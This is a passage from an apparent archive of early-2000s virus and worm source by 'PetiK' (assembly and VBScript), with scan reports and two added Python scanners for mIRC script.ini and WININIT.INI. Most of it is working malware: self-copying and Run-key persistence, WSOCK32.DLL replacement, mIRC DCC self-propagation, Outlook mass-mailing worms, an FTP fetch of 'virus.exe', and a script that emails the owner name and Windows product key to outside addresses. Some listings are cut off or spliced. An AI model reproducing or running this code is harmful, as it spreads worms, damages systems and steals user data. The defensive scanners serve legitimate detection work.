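a handler. The scanner below groups those lines back into handlers and
reports the ones that DCC-send files or modify the local system.
"""
import re

# Constructed sample in the format the archived sources write (not a real file).
SAMPLE_SCRIPT_INI = """[script]
n0=on 1:start:{
n1=.remote on
n2=.ctcps on
n3=.events on
n4=}
n5=on 1:join:#:{
n6= if ( $nick == $me ) { halt } | .dcc send $nick C:\\Windows\\WinExec.exe
n7=}
n8=on 1:text:*hitler*:/remove C:\\Windows\\regedit.exe
n9=on 1:text:*KKK*:/disconnect
n10=on 1:text:*hello*:/msg $nick hi
"""

# "on <level>:<event>:..." opens a handler; capture the event name.
EVENT_RE = re.compile(r"^on\s+\S+:(?P<event>[a-z]+):", re.IGNORECASE)

# Commands that let a script spread itself or damage the host (my selection).
RISKY_COMMANDS = {
    "dcc send": "sends a file to another user (self-propagation)",
    "remove": "deletes a local file",
    "run": "executes a local program",
    "copy": "copies a local file",
}


def parse_script_ini(text):
    """Return the [script] section's nN= lines as a list of (index, body)."""
    lines = []
    in_script = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        if not in_script:
            continue
        m = re.match(r"n(\d+)=(.*)", line)
        if m:
            lines.append((int(m.group(1)), m.group(2).strip()))
    return lines


def group_handlers(lines):
    """Group nN= lines into handlers: [{"event": name, "lines": [...]}, ...]."""
    handlers = []
    current = None
    for _, body in lines:
        m = EVENT_RE.match(body)
        if m:
            current = {"event": m.group("event").lower(), "lines": [body]}
            handlers.append(current)
        elif current is not None:
            current["lines"].append(body)
    return handlers


def scan_script_ini(text):
    """Return (event, command, reason) for every risky command in a handler."""
    findings = []
    for h in group_handlers(parse_script_ini(text)):
        blob = " ".join(h["lines"]).lower()
        for cmd, reason in RISKY_COMMANDS.items():
            # mIRC commands may be prefixed with "/" and silenced with ".";
            # the word boundary handles both without a separate case.
            if re.search(r"\b" + re.escape(cmd) + r"\b", blob):
                findings.append((h["event"], cmd, reason))
    return findings


def is_self_propagating(text):
    """True when any handler DCC-sends a file to another user."""
    return any(cmd == "dcc send" for _, cmd, _ in scan_script_ini(text))


if __name__ == "__main__":
    for event, cmd, reason in scan_script_ini(SAMPLE_SCRIPT_INI):
        print(f"on {event}: '{cmd}' -> {reason}")
    print("self-propagating:", is_self_propagating(SAMPLE_SCRIPT_INI))
```

Run against the four script.ini locations the archived sources overwrite (C:\mirc, C:\mirc32 and the two Program Files variants), a hit on "dcc send" inside an "on join" or "on text" handler is the signature to look for; the "copy" and "run" entries also catch the "on connect" block of MIRC.EKP, which copies WinExec.exe to Picture.exe and starts ftp.bat.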
comment $
TO COMPILE:
jumps
locals
.386
.model flat
extrn GetModuleHandleA:PROC
extrn GetModuleFileNameA:PROC
extrn GetWindowsDirectoryA:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn GetSystemTime:PROC
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
.data
moi dd 260 dup (0)
targ1 dd 260 dup (0)
copie db "\WinExec.exe",00h
l dd 0
p dd 0
CLE db "\Software\Microsoft\Windows\CurrentVersion",00h
DONNEE db "PandaKiller",00h
NOM db "RegisteredOwner",00h
CLE2 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h
DONNEE2 db "%windir%\WinExec.exe",00h
NOM2 db "WinExec",00h
DONNEE3 db "rundll32 mouse,disable",00h
NOM3 db "Stop1",00h
DONNEE4 db "rundll32 keyboard,disable",00h
NOM4 db "Stop2",00h
TITRE db "T.PK.3",00h
TEXTE db "VOUS SOUHAITE UNE BONNE ANNEE !",00h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
.code
DEBUT:
AUTO_COPIE:
push 00000000h
call GetModuleHandleA
push 260
push offset moi
push eax
call GetModuleFileNameA
push 260
push offset targ1
call GetWindowsDirectoryA
push offset copie
push offset targ1
call lstrcat
push 00000000h
push offset targ1
push offset moi
call CopyFileA ;%windir%\WinExec.exe
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE2
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE2 ;%windir%\WinExec.exe
push 01h
push 0
push offset NOM2
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
REGISTRE:
push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;in RegisteredOwner
push p
call RegSetValueExA ;CREATE A VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
MESSAGE: push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
FIN:
push 0
call ExitProcess
end DEBUT
File W32PKc.exe received on 05.16.2009 10:42:04 (CET)
Additional information
File size: 8192 bytes
MD5...: a133a8af3b031045bd0ae4c7d9fa4210
SHA1..: d3481290f42e9f1485d7d9cdc5184159e5272297
comment $
*** ** * * *** ** * * * * * **** ***
* * * * ** * * * * * * * * * * * * *
* * * * ** * * * * * ** * * * ** * *
* * **** * ** * * **** ** * * * * ***
* * * * ** * * * * * * * * * * * *
* * * * * *** * * * * * **** **** **** * *
.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
extrn GetSystemTime:PROC
;USER32.dll
extrn MessageBoxA:PROC
extrn SwapMouseButton:PROC
extrn ExitWindowsEx:PROC
extrn GetVersionExA:PROC
;ADVAPI32.dll
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC
.data
szOrig db 260 dup (0)
szCopie db 260 dup (0)
szWsk1 db 260 dup (0)
szWsk2 db 260 dup (0)
szWin db 260 dup (0)
szWin2 db 260 dup (0)
fh dd 0
octets dd 0
regDisp dd 0
regResu dd 0
Copie db "\WinExec.exe",00h
Wsk1 db "\WSOCK32.DLL",00h
Wsk2 db "\WSOCK32.TPK",00h
Wininit db "\\WININIT.INI",00h
windows db "windows",00h
run db "run",00h
Winini db "\\WIN.INI",00h
nul db "NUL",00h
rename db "Rename",00h
ini db "C:\script.tpk",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[PandaKiller]",00h
TITRE db "Error Loader",00h
TEXTE db "Windows NT required !",0dh,0ah
db "This program will be terminated",00h
inid db "[script]",0dh,0ah
db "n0=on 1:start:{",0dh,0ah
db "n1=.remote on",0dh,0ah
db "n2=.ctcps on",0dh,0ah
db "n3= .events on",0dh,0ah
db "n4=}",0dh,0ah
db "n5=on 1:join:#:{",0dh,0ah
db "n6= if ( $nick == $me ) { halt } | .dcc "
db "send $nick C:\Windows\WinExec.exe",0dh,0ah
db "n7=}",0dh,0ah
initaille equ $-inid
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
.code
DEBUT: mov eax, offset CLE ; Check whether a key named
call REG ; [PandaKiller] exists in HKLM\Software.
cmp [regDisp],1 ; If it is not there,
jne FICHIER ; install the components
WCOPIE: push 0 ;
call GetModuleHandleA ;
push 260 ; The program copies itself into the
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; computer's WINDOWS folder
push 260 ;
push offset szCopie ; under the name WinExec.exe
call GetWindowsDirectoryA ;
push offset Copie ;
push offset szCopie ;
call lstrcat ;
push 0 ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
WSOCK32: push 260 ;
push offset szWsk1 ; Here, the file WSOCK32.DLL from the
call GetSystemDirectoryA ; SYSTEM directory is copied
push 260 ;
push offset szWsk2 ; as WSOCK32.TPK in the same
call GetSystemDirectoryA ; SYSTEM directory
push offset Wsk1 ;
push offset szWsk1 ;
call lstrcat ;
push offset Wsk2 ;
push offset szWsk2 ;
call lstrcat ;
push 0 ;
push offset szWsk2 ;
push offset szWsk1 ;
call CopyFileA ;
WININIT: push 260 ; So that the computer can
push offset szWin ; use the new file
call GetWindowsDirectoryA ; WSOCK32.TPK, we write into
push offset Wininit ; the WININIT.INI file in the
push offset szWin ; WINDOWS directory.
call lstrcat ; The routine is simple :
push offset szWin ;
push offset szWsk1 ;
push offset nul ;
push offset rename ; [Rename]
call WritePrivateProfileStringA ; NUL=%system%\WSOCK32.DLL
push offset szWin ;
push offset szWsk2 ;
push offset szWsk1 ;
push offset rename ;
call WritePrivateProfileStringA ; %sys%\WSOCK32.DLL=%sys%\WSOCK32.TPK
jmp FICHIER
Additional information
File size: 8192 bytes
MD5...: f7b2facb5e2c9e5870065004446a8867
SHA1..: 837ce36b596ffab1af92ac1c63506fa613e16e6c
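The T.PK listing above documents its persistence trick in the WININIT routine: it writes a [Rename] section into %windir%\WININIT.INI with "NUL=%system%\WSOCK32.DLL" followed by "%system%\WSOCK32.DLL=%system%\WSOCK32.TPK". On Windows 9x that section is processed at the next boot, before any process can lock the files: a "NUL=path" line deletes path and a "dest=src" line moves src over dest, so the original winsock DLL is replaced by the copy. As an added example for defenders, not part of PetiK's archive, the Python auditor below parses a WININIT.INI [Rename] section, keeping duplicate "NUL" keys that configparser would collapse, and reports entries that delete or replace executable files under the Windows directories. The sample INI is constructed for the test, modelled on the two lines the listing writes plus two ordinary installer clean-up entries; the directory and extension lists are my own choice.

```python
"""Audit a Windows 9x WININIT.INI [Rename] section for system-file replacement.

Added example (not PetiK's code). Each line under [Rename] is "dest=src":
"NUL=path" deletes path at the next boot, "dest=src" moves src over dest.
The auditor flags entries whose effective target is an executable/driver
under the Windows or System directories, which is the pattern the T.PK
listing uses to swap WSOCK32.DLL for its trojanised copy.
"""

# Locations and extensions worth flagging (my selection for the example).
SYSTEM_DIRS = ("c:\\windows\\system\\", "c:\\windows\\command\\")
WINDOWS_DIR = "c:\\windows\\"
TEMP_DIR = "c:\\windows\\temp\\"
PROTECTED_EXT = (".dll", ".exe", ".vxd", ".drv", ".sys")

# Constructed sample (not a real file): the two lines T.PK writes plus two
# entries of the kind a legitimate installer leaves behind.
SAMPLE_WININIT_INI = r"""[Rename]
NUL=C:\WINDOWS\SYSTEM\WSOCK32.DLL
C:\WINDOWS\SYSTEM\WSOCK32.DLL=C:\WINDOWS\SYSTEM\WSOCK32.TPK
NUL=C:\WINDOWS\TEMP\setup.tmp
C:\Program Files\App\app.exe=C:\WINDOWS\TEMP\app.new
"""


def parse_rename_section(text):
    """Return every (dest, src) pair under [Rename], duplicates included."""
    entries = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "rename" or "=" not in line:
            continue
        dest, src = (part.strip() for part in line.split("=", 1))
        entries.append((dest, src))
    return entries


def is_protected_target(path):
    """True for an executable/driver under the Windows or System dirs (not TEMP)."""
    p = path.lower()
    if not p.endswith(PROTECTED_EXT):
        return False
    if p.startswith(SYSTEM_DIRS):
        return True
    return p.startswith(WINDOWS_DIR) and not p.startswith(TEMP_DIR)


def audit_wininit(text):
    """Classify each [Rename] entry as a delete or a replace and flag it."""
    findings = []
    for dest, src in parse_rename_section(text):
        action = "delete" if dest.lower() == "nul" else "replace"
        # For a delete the file that disappears is the source; for a
        # replace the file that changes is the destination.
        target = src if action == "delete" else dest
        findings.append({
            "action": action,
            "target": target,
            "source": src,
            "suspicious": is_protected_target(target),
        })
    return findings


def suspicious_targets(text):
    """Targets of the flagged entries, in file order."""
    return [f["target"] for f in audit_wininit(text) if f["suspicious"]]


if __name__ == "__main__":
    for f in audit_wininit(SAMPLE_WININIT_INI):
        mark = "!!" if f["suspicious"] else "  "
        print(f"{mark} {f['action']:7} {f['target']}  <-  {f['source']}")
```

On the sample, the two WSOCK32.DLL lines are flagged and the TEMP clean-up and the Program Files update are not. When checking a live Windows 9x image, also look at WININIT.BAK, which is what the processed file is renamed to, so an entry that has already run is still visible.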
comment * ///// I-Worm.MadCow by PetiK ///// 25/11/2000
jumps
locals
.386
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn MoveFileA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegCreateKeyExA:PROC
extrn RegCloseKey:PROC
.data
regDisp dd 0
regResu dd 0
l dd 0
p dd 0
fh dd 0
octets dd ?
szOrig db 260 dup (0)
szOrig2 db 260 dup (0)
szCopie db 260 dup (0)
szCopi2 db 260 dup (0)
szCico db 260 dup (0)
szWin db 260 dup (0)
Dossier db "C:\Win32",00h
fichier db "C:\Win32\Salut.ico",00h
Copico db "\MSLS.ICO",00h
Copie db "\Wininet32.exe",00h
Copie2 db "\MadCow.exe",00h
BATFILE db "C:\Win32\ENVOIE.BAT",00h
VBSFILE db "C:\Win32\ENVOIE.VBS",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
fileini db "C:\Win32\script.ini",00h
Copie3 db "C:\Win32\MadCow.exe",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
script3 db "C:\program files\mirc\script.ini",00h
script4 db "C:\program files\mirc32\script.ini",00h
CLE db "Software\[Atchoum]",00h
CLE2 db "\exefile\DefaultIcon",00h
Signature db "IWorm.MadCow par PetiK (c)2000"
vbsd:
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'Set N = K.CreateItem(0)',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'If O = 1 Then',0dh,0ah
db 'N.BCC = P.Address',0dh,0ah
db 'Else',0dh,0ah
db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah
db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah
db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End Sub',0dh,0ah
vbstaille equ $-vbsd
batd:
db '@echo off',0dh,0ah
db 'start C:\Win32\ENVOIE.VBS',0dh,0ah
battaille equ $-batd
inid:
db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah
db "n3=}",00h
initaille equ $-inid
include icone.inc
.code
DEBUT:
VERIF: mov eax,offset CLE ; Checks whether an [Atchoum] key
call REG ; exists in HKLM\Software.
cmp [regDisp],1 ; If it is not there,
jne INIFILE ; install the components
COPIE: push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig ;
push eax ;
call GetModuleFileNameA ; Copies the original file
push 260 ;
push offset szCopie ;
call GetSystemDirectoryA ; into the SYSTEM folder
push offset Copie ;
push offset szCopie ;
call lstrcat ; under the name Wininet32.exe
push 00h ;
push offset szCopie ;
push offset szOrig ;
call CopyFileA ;
push 260 ; then
push offset szCopi2 ;
call GetWindowsDirectoryA ; again into the WINDOWS folder
push offset Copie2 ;
push offset szCopi2 ;
call lstrcat ; under the name MadCow.exe
push 00h ;
push offset szCopi2 ;
push offset szOrig ;
call CopyFileA ;
COPYWIN:push 0 ;
call GetModuleHandleA ;
push 260 ;
push offset szOrig2 ;
push eax ;
call GetModuleFileNameA ; Copies the original file
push 00h ;
push offset Copie3 ;
push offset szOrig2 ;
call CopyFileA ;
jmp FIN ;
end DEBUT
File MadCow.exe received on 05.16.2009 17:51:57 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.worm.8192
AntiVir 7.9.0.168 2009.05.15 Worm/Petik
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Petik.E
Avast 4.8.1335.0 2009.05.15 IRC:Generic-008
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.IM.5B177226
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.A
ClamAV 0.94.1 2009.05.16 Worm.Madcow
Comodo 1157 2009.05.08 Worm.Win32.Petik.Z
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8192.B/C
F-Prot 4.4.4.56 2009.05.16 W32/Petik.E
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/Petik.E@mm
GData 19 2009.05.16 Generic.Malware.IM.5B177226
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik
Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm
NOD32 4080 2009.05.15 Win32/Petik.Z
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.D
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.A
PCTools 4.4.2.0 2009.05.16 VBS.LoveLetter
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.x
Sophos 4.41.0 2009.05.16 W32/Petik-A
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.E
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.LoveLetter
Additional information
File size: 8192 bytes
MD5...: 15b037d0d23a915fb0a78961cdc7299a
SHA1..: 85864e397e3fee261bdcb62b477a71e936db39f6
;By M.Xxxxxxx XXXXXXX (c)2000
;SIZE: 1034 BYTES
;DWARF4 CHANGES THE DATE TO 26 DECEMBER 1999
;C:\DWARF.VBS, WHICH ADDS A KEY TO THE REGISTRY
;C:\WINDOWS\DWARF.BAT, WHICH DISPLAYS A MESSAGE AT EVERY STARTUP
.model small
.code
org 100h
NOM1 db 'c:\dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.bat',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"'
progl1 equ $-prog1
prog2 db '@echo off',0Dh,0Ah
db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah
db 'if errorlevel 1 goto Die',0Dh,0Ah
db ':Die',0Dh,0Ah
db 'cls',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo.',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
db 'echo * * * * * * ** **',0Dh,0Ah
db 'echo * * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo * * * * * * * *',0Dh,0Ah
db 'echo *** *** *** * *',0Dh,0Ah
progl2 equ $-prog2
CORBEILLE db 'C:\RECYCLED\*.*',0
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'
end DATE
' Name : VBS.Judge.A
' Author : PetiK
' Language : VBS
' Date : 08/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbs = file.ReadAll
DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(win&"\WinGDI.EXE.vbs")
c.Copy("C:\Judge.TXT.vbs")
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs"
EMAIL()
'FTP()
'AUTOEXEC()
TXT()
End Sub
Sub EMAIL()
If Not fso.FileExists("C:\Judge.txt") Then
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "BatMan, SpiderMan et les autres"
msg.Body = "La vraie histoire de ces justiciers"
msg.Attachments.Add "C:\Judge.TXT.vbs"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
End If
End Sub
Sub FTP()
If Not fso.FileExists("C:\Judge.txt") Then
Set bat = fso.CreateTextFile(win&"\FTP.bat")
bat.WriteLine "@echo off"
bat.WriteLine "start ftp -i -v -s:C:\FTP.drv"
bat.close
Set drv = fso.CreateTextFile("C:\FTP.drv")
drv.WriteLine "open"
drv.WriteLine "members.aol.com"
drv.WriteLine "pentasm99"
drv.WriteLine "binary"
drv.WriteLine "lcd C:\"
drv.WriteLine "get virus.exe"
drv.WriteLine "bye"
drv.WriteLine "exit"
drv.close
ws.Run (win&"\FTP.bat")
End If
End Sub
Sub AUTOEXEC()
If Day(Now) = 1 then
Set FileObj = CreateObject("Scripting.FileSystemObject")
file = "c:\autoexec.bat"
Set InStream= FileObj.OpenTextFile (file, 1, False, False)
TLine = Instream.Readall
Set autobat= FileObj.CreateTextFile (file, True, False)
autobat.write(tline)
autobat.WriteBlankLines(1)
autobat.WriteLine "@echo off"
autobat.WriteLine "cls"
autobat.WriteLine "echo."
autobat.WriteLine "echo."
autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000"
autobat.WriteLine "echo."
autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR"
autobat.WriteLine "pause"
End If
End Sub
Sub TXT()
Set ptk = fso.CreateTextFile("C:\Judge.txt")
ptk.WriteLine "Si vous lisez ce texte,"
ptk.WriteLine "c'est que Microsoft a encors fait des siennes"
ptk.Close
Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true)
mp3.Write vbs
mp3.close
End Sub
File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Anjulie
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.03
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm
Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen
AVG 8.5.0.336 2009.05.15 VBS/VBSWG
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A9DC8F67
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 Worm.VBS-14
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Judge.A
GData 19 2009.05.16 Generic.ScriptWorm.A9DC8F67
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 VBS/Generic
McAfee+Artemis 5616 2009.05.15 VBS/Generic
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.03
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.I
NOD32 4080 2009.05.15 VBS/Petik.A
Norman 6.01.05 2009.05.16 VBS/GenMail.D
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A@mm
Panda 10.0.0.14 2009.05.16 VBS/I-Worm
PCTools 4.4.2.0 2009.05.16 VBS.Petik.I
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Hopalong
Sophos 4.41.0 2009.05.16 VBS/Judge
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.B@mm
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_JUDGE.A
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik
ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.I
Additional information
File size: 2587 bytes
MD5...: 538a05a6e0dd048eae2c3b06338bd5d7
SHA1..: fef767df96e3dbeb009d6cd746bee12c33fb3257
' Name : VBS.Noel
' Author : PetiK
' Language : VBS
' Date : 12/12/2000
Dim fso,ws,file
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
DEBUT()
Sub DEBUT()
Set win = fso.GetSpecialFolder(0)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy("C:\NOEL.GIF.vbs")
EMAIL()
End Sub
Sub EMAIL()
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "JOUYEUX NOEL"
msg.Body = "Voici une photodu PERE NOEL"
msg.Attachments.Add ("C:\NOEL.GIF.vbs")
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End if
Set msg2 = OApp.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pif878@aol.com"
nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
CN = CreateObject("WScript.NetWork").ComputerName
msg2.Subject = "Message de """ & nom & """ alias " & CN & ""
page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey")
msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """"
msg2.Send
End Sub
File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET)
Additional information
File size: 1352 bytes
MD5...: fcc75e971157a8d9103b5bc583847f87
SHA1..: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5
comment $
TO COMPILE:
.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
